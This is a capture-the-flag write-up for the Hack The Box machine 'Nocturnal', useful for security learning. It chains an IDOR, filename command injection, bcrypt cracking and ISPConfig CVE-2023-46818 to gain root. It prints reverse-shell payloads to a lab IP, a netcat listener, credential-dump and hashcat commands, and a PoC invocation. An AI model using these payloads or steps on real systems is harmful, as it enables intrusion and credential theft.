HTB: Nocturnal

Chaining an IDOR vulnerability with command injection for initial access, cracking a SQLite password hash for lateral movement, then exploiting ISPConfig CVE-2023-46818 to reach root.

Enumeration

Starting with an Nmap scan against the target revealed two open ports: SSH on 22 and HTTP on 80. The web service returned a redirect requiring a hostname, so I added nocturnal.htb to my /etc/hosts file before proceeding.

nmap -sV -sC -oA nocturnal 10.10.11.x
# Results: 22/tcp ssh, 80/tcp http (redirects to nocturnal.htb)

Navigating to the site presented a file storage web application with user registration and login functionality. After creating an account, I found a file upload feature that performed server-side MIME type validation — only certain file types were accepted. Directory fuzzing with ffuf revealed no hidden paths of immediate interest, so I turned attention to the application logic.

Initial Access — IDOR to Command Injection

Exploiting the IDOR

The file listing functionality exposed a username parameter in the request used to retrieve another user's file list. By supplying a non-existent username, the application returned error messages that disclosed valid usernames registered on the system — a classic Insecure Direct Object Reference (IDOR) vulnerability combined with user enumeration.

Once valid usernames were identified, I could request the file listing for any of them and view — and download — files they had uploaded, with no authorisation check in place. Among the accessible files was a PHP archive uploaded by an administrative user. Downloading and extracting it revealed application source code and embedded credentials.

Command Injection via File Upload

Reviewing the source code uncovered a file processing function that passed user-supplied filenames to a shell command without sanitisation. By crafting a filename containing a command injection payload, I was able to trigger execution as the www-data user. I set up a netcat listener and triggered a reverse shell:

# Listener
nc -lvnp 4444

# Triggered via crafted filename parameter in upload request
filename=shell.php; bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'

The reverse shell connected, landing me as www-data on the target.

Lateral Movement — Hash Cracking

With a foothold on the system, I began local enumeration. The application stored user data in a SQLite database within the web root. Extracting the database and reading the users table revealed password hashes for all registered accounts, including the system user tobias.

sqlite3 /var/www/nocturnal.htb/database.db
sqlite> SELECT username, password FROM users;
tobias | $2y$10$[bcrypt hash]

I transferred the hash to my machine and cracked it with hashcat using the rockyou.txt wordlist. The password cracked successfully, and using it I was able to SSH in directly as tobias and retrieve the user flag.

hashcat -m 3200 tobias.hash /usr/share/wordlists/rockyou.txt

Privilege Escalation — ISPConfig CVE-2023-46818

As tobias, I ran through my standard privilege escalation checklist. Checking running services and listening ports revealed an ISPConfig instance accessible on localhost. ISPConfig is a web-based server control panel, and version identification confirmed it was running a build vulnerable to CVE-2023-46818 — an authenticated remote code execution vulnerability.

# Port forward ISPConfig to local machine for browser access
ssh -L 8080:127.0.0.1:8080 [email protected]

Using tobias's credentials (reused from the SQLite crack) to log into ISPConfig, I exploited CVE-2023-46818 — which abuses a PHP code injection path within the panel's DNS zone editor — to execute a command as root. A public PoC script automated the payload delivery:

python3 cve-2023-46818.py \
  --url http://127.0.0.1:8080 \
  --user tobias \
  --pass [cracked_password] \
  --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.x/4444 0>&1"'

The ISPConfig panel was running as root — a common but dangerous configuration for web-based server management software. Any authenticated RCE in the panel translates directly to full system compromise.

The reverse shell connected as root. Flag retrieved.

Takeaways

IDOR + user enumeration in file storage applications is a recurring pattern — always test whether object references are enforced server-side, not just hidden in the UI.
SQLite databases in web roots are a common finding on PHP applications — they are readable by the web process and often contain credentials that reuse across system accounts.
Localhost services are worth enumerating thoroughly. Internal web panels, databases, and management interfaces frequently run with elevated privileges and lag behind on patching.
Password reuse between the web application and system accounts accelerated this chain significantly — a single cracked hash gave both SSH access and ISPConfig login.